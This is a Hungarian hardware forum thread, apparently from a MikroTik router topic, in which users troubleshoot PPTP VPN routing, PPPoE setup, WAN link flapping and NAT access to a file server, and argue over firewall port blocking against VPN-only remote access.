Ránézésre a cserélt kondi mellett a bal oldali másik kettő is púpos. Ha hosszú távra akarod megjavítani akkor mindegyik tápon levő kondit cserélni kell (a jókat is) mert hasonló az élettartamuk, előbb-utóbb a többi nem cserélt is tönkremehet. Ha közel örök életre akarod megoldani: Az 5V / 3,3V-os részhez lehet kapni polimer kondikat, közel 5....10X annyit bírnak mint a sima alu-elkók. Régebben tucatszám javítottam ilyeneket, néhányba került polimer-kondi is. Azért nem mindbe mert főnök sokallta az árát (párszáz Ft plusz egy alaplapnál nem sok, de 100db-os nagyságrendnél esetleg az)
-
kovyhun
tag
Ezt a táblázatot nézegettem már ha erről van szó: https://wiki.mikrotik.com/wiki/Supported_Hardware
De inkább tapasztalat érdekelne, mi az mi nálunk beszerezhető, nem túl drága és bevállt, nincsenek nyűgjei.
A táblázatban a most használt 3G modemem sincs benne, valószínű nem teljes a lista, illetve ugyanaz a hardver több néven is kijöhetett. -
kovyhun
tag
Igen mindig a route táblánál akadok el
Most ehhez hasonlóan próbáltam, de itt is a route beállítás nem ment:
https://systemzone.net/mikrotik-vpn-configuration-with-site-to-site-pptp/
Most adatforgalom sincsA felépítés:
Otthon
ADSL pptp szerver ------ internet ------- Mobilnet pptp kliens
LAN:10.0.1.1 - 1.1.1.1 -------------------- 1.1.1.2 - LAN:10.0.0.1[admin@MikroTik-ADSL] /ip route> print
Flags: X - disabled, A - active, D - dynamic, C - connect, S - static, r - rip, b - bgp, o - ospf, m - mme, B - blackhole, U - unreachable, P - prohibit
# DST-ADDRESS PREF-SRC GATEWAY DISTANCE
0 ADS 0.0.0.0/0 pppoe-out1 0
1 ADC 1.1.1.2/32 1.1.1.1 <pptp-vpn-hegy> 0
2 DS 10.0.0.0/24 1.0.0.2 1
3 ADC 10.0.1.0/24 10.0.1.1 bridge 0
4 ADC 145.235.238.12/32 78.92.79.23 pppoe-out1 0
[admin@MikroTik-Home] /ip route>-
[admin@MikroTik-Mobilnet] /ip route> print
Flags: X - disabled, A - active, D - dynamic, C - connect, S - static, r - rip, b - bgp, o - ospf, m - mme, B - blackhole, U - unreachable, P - prohibit
# DST-ADDRESS PREF-SRC GATEWAY DISTANCE
0 ADS 0.0.0.0/0 Telekom-mobil--... 1
1 ADC 1.1.1.1/32 1.1.1.2 vpn-otthon 0
2 ADC 10.0.0.0/24 10.0.0.1 bridge 0
3 A S 10.0.1.0/24 vpn-otthon 1
4 ADC 10.112.112.137/32 10.143.67.237 Telekom-mobil--... 0
[admin@MikroTik] /ip route>Az a baj, hogy nem látom át mi-mikor-merre...
Sőt, maradhattak benne előző próbálkozásokból is bejegyzések. -
ekkold
Topikgazda
Tulajdonképpen csak kényelem, mert így a címtartományhoz elég csak a pool-t megfelelően megadni. Amúgy a local address valóban lehetne 1db fix IP cím is. Amikor csak 1db pont-pont kapcsolatot kell beállítani, akkor simán elég 2db fix IP, és pool sem kell. Jelen esetben több kliens is csatlakozhat egyszerre azonos jelszóval (amíg a pool el nem fogy).
-
ekkold
Topikgazda
Van igazság abban amit írsz, de nézhetjük úgy is a dolgot, hogy ha pl. beesik valaki egy olyan kérdéssel, hogy: "Nem megy a net a mikrotiken, mit állítsak be?" Akkor belinkelem neki az oldalt, hogy tessék: ezeket állítsd be...
Amúgy a mikrotik sem véletlenül nyitott a soho kategória felé, és vélhetőleg a "quick setup" is ezért került be. -
f8enter
aktív tag
A PPPoE-t hozzáadtam a BR-WAN-hoz, itt:
/interface pppoe-client
add add-default-route=yes disabled=no interface=BR-WAN name="Digi PPPoE" \
password=***** user=*****Meg is jelenik az Interface List-ben a BR-WAN alatt. Nem így kell beállítani?
Azért kreáltam neki bridget, hogy ha változik a szolgáltató (=belső hálóról kirakom) akkor ne kelljen mindenhol átírni a szabályokat, hivatkozásokat.
-
ekkold
Topikgazda
Nekem évekkel ezelőtt azért segített volna egy ilyen útmutató. Nem a hálózatos ismeretek hiányoztak, hanem hogy a mikrotik logikáját jobban megértsem. Sokszor csak egy kezdő lökés kell, hogy az ember egyáltalán keresni vagy értelmesen kérdezni tudjon, utána már magától is tud haladni, pl. akár a wiki leírások alapján (ha másképp nem megy, akkor ott a google fordító). A mikrotik router valóban nem mindenkinek valóü, de aki belevág, és van benne szándék a tanulásra, annak szerintem jól jöhet egy kis kezdeti segítség - ezért készült ez a leírás. Így egyrészt nem a fórumban foglalja a helyet, másrészt sehol nem látom, hogy ez csak a profi mikrotikesek fóruma lenne, vagy hogy tilos lenne kezdőknek is kérdeni ebben a témában. De ha gondolod nyugodtan kezdeményezd, hogy legyen külön mikrotik kezdő, és külön mikrotik haladó kérdések fóruma.
Egyébként a mikrotik tanfolyamok nem olcsók, hobbiból senki sem fog elmenni ilyenre, én sem jártam tanfolyamra, a neten tanultam bele valamennyire, és bár nem tartom magam kezdőnek, még mindíg előfordul, hogy új dolgokat tanulok meg a mikrotikről.
-
laracroft
senior tag
Szia, tudom, hogy rég volt, de azért visszajelzek, hogy végül működött anno az ötleted a wan flapping problémámra.
Felvittem a router-t közvetlenül a UPC-s modem mellé és kipróbáltam. Minden prímán működött, gigabites up volt.
Lehoztam a földszintre a router-t és rádugtam a modemből jövő kb. 20m hosszú CAT5E-s kábelre. Azon nyomban elkezdett flap-olni ráadásul nem is gigabit sebességgel próbált kapcsolódni, hanem 10 vagy 100 M-el.
Ekkor próbáltam ki az általad ajánlott switch megoldást, a modem és a router közé raktam egy gigabites "buta" switch-et. Azon nyomban megjavult minden.Szóval csak utólag szeretném megköszönni a segítséget nemcsak neked, hanem mindenkinek, aki próbálkozott.
-
ekkold
Topikgazda
-
ekkold
Topikgazda
"Gondolom el se tudod képzelni, hogy van egy csomó adat gyűjtő (pl sok milliós geodéziai) műszer amibe egyszerűen nem tudod beírni az eltérő port számot, nem tud vpn-t se, sőt, még dns nevet se lehet beírni, csak ip címet, ahova sima egyszerű plain text-es hitelesítéssel okádja bele az általa készített fájlokat."
Vannak ilyen eszközök, de ilyeneket nem dugunk rá közvetlenül a netre (mert esetleg valaki csak úgy viccből széthekkeli), általában egy router/tűzfal mögött tanyáznak - ott ezeknek az eszközöknek lenne a dolga a biztonságos csatlakozás megoldása.
Ahol meg pénzért http szolgáltatás van az már messze nem egy sima iroda, egy soho kategóriás routerrel, ilyesmit nem kellene belekeverni abba amiről eredetileg szó volt...
-
ekkold
Topikgazda
Nekem eddig mindig jól működött a VPN mobiltelefonról is, nem tudom neked miért okoz problémát. Az ftp szerintem nem gond ha más porton megy. Ha levelező szervert akarnék a net felé kinyitni, akkor azt eleve fokozott biztonsággal tenném csak meg, de inkább csak VPN-en keresztül engedném. Szóval mi a fontosabb,a kényelem vagy a biztonság? Az eredmény mindenképpen kompromisszum.
Jónéhány ismerősöm szokott távolról dolgozni. Különböző cégekről van szó, de egy dologban mindegyik egyezik: kizárólag VPN-en keresztül engedik be távolról a céges hálózatba. Semmilyen szolgáltatás (az általad felsoroltak egyike sem) érhető el enélkül, nincsenek kifelé nyitott portok a VPN-t kivéve. Gondolom ez nem véletlen.
Szerintem a hasonlatod erősen túloz, és nem állja meg a helyét.
-
ekkold
Topikgazda
Nekem a telefonomon is van FTP szerver, így wifin keresztül is el tudom érni a rajta levő fájlokat. De az sem a 21-es porton megy , hanem történetesen a 4021-es proton. A router esetében is hasonló lehetne helyzet. Pl. ftp://domain:62341 az FTP elérés, aki meg a 21-es porton akar bejönni az ugyanúgy mehet a feketelistára....
Ezzel csak arra akartam rávilágítani, hogy szerintem akár egy "rendes irodában" is működhetne így a dolog. Az ilyen szűrésnek van még egy előnye, mégpedig: a hacker aki felkerül a feketelistára, onnantól kezvde a többi portot sem éri el - azaz minden más addig nyitott port az ő számára már zárva van.
-
ekkold
Topikgazda
Egyrészt - ha jobban megnézed - csak a WAN oldalról tiltom ezeket a portokat, a LAN IP tartományából nem. Továbbá az ftp, http, mail szerver, SSH - ha szükség van rá - tetszés szerinti portra átrakható, és ott továbbra is használható. Amúgy meg a távoli használathoz csatlakozzon be a user VPN-el, utána mindent elér, mert gyakorlatilag bekerül a helyi hálózatba - akkor is ha amúgy a WAN oldal felől minden egyéb tiltva van.
-
Fooler89
őstag
Nem, a fájlszervert név alapján szeretném elérni, dns feloldása megtörténik viszont ha a fent nat rule nincs aktiválni akkor nem érem el a megosztásokat.
Most megint lehet nagy hülyeséget mondok, de az a nat rule konkrétan átírja az ip címet a mikrotikéra. Az az 17-es végződésűre és ezzel tudja elérni a 0-ás tartományban lévő win fájlszervert. Így miért működik?
Win tűzfal tartományira van állítva, de majd lecsekkolom mégegyszer.
Ha nagy hülyeséget mondtam akkor elég egy nincs igazam és utána olvasok a dolgoknak.
-
Fooler89
őstag
-
Fooler89
őstag
A 192.168.0.0/24-es hálozaton a pfsense az átjáró.
Mikrotiken rádugtam az ether3-ra és adtam neki egy címet 192.168.0.10-et.Ha nincs a fent szabály bekapcsolva, akkor a 0-ás tartományba lévő fájl szervert nem tudom elérni a miktrotiken (wifis) eszközökről.
A 0-ból viszont elérem a wifis eszközön megosztott tartalmat.
És a home rendszergazda a király. Mert olcsó, mert szinte majdnem mindent tud.
Új hozzászólás Aktív témák
Hirdetés
ekkold- Honor 200 Pro - mobilportré
- Milyen belső merevlemezt vegyek?
- Audi, Cupra, Seat, Skoda, Volkswagen topik
- Intel Core i3 / i5 / i7 / i9 10xxx "Comet Lake" és i3 / i5 / i7 / i9 11xxx "Rocket Lake" (LGA1200)
- Kerékpárosok, bringások ide!
- Motorolaj, hajtóműolaj, hűtőfolyadék, adalékok és szűrők topikja
- Fotók, videók mobillal
- Le Mans Ultimate
- AMD K6-III, és minden ami RETRO - Oldschool tuning
- Xbox Series X|S
- További aktív témák...
- AKCIÓ! MSI B450 R5 5500 16GB DDR4 512GB SSD RTX 2070 8GB GDDR6 Rampage Shiva Zalman 500W
- Lenovo Thinkpad P1 gen1, gen2, P52s FHD, 4K oled touch
- Apple iPhone 16 Pro Max - Desert Titanium - 256GB 1 ciklus 100% akku! 1 év garancia! Új készülék!
- Bomba ár! Lenovo ThinkPad P50 - i7-HQ I 16GB I 256SSD I Nvidia I 15,6" FHD I Cam I W10 I Gari!
- Telefon felvásárlás!! Samsung Galaxy S23/Samsung Galaxy S23+/Samsung Galaxy S23 Ultra
Állásajánlatok
Cég: CAMERA-PRO Hungary Kft
Város: Budapest
Cég: PC Trade Systems Kft.
Város: Szeged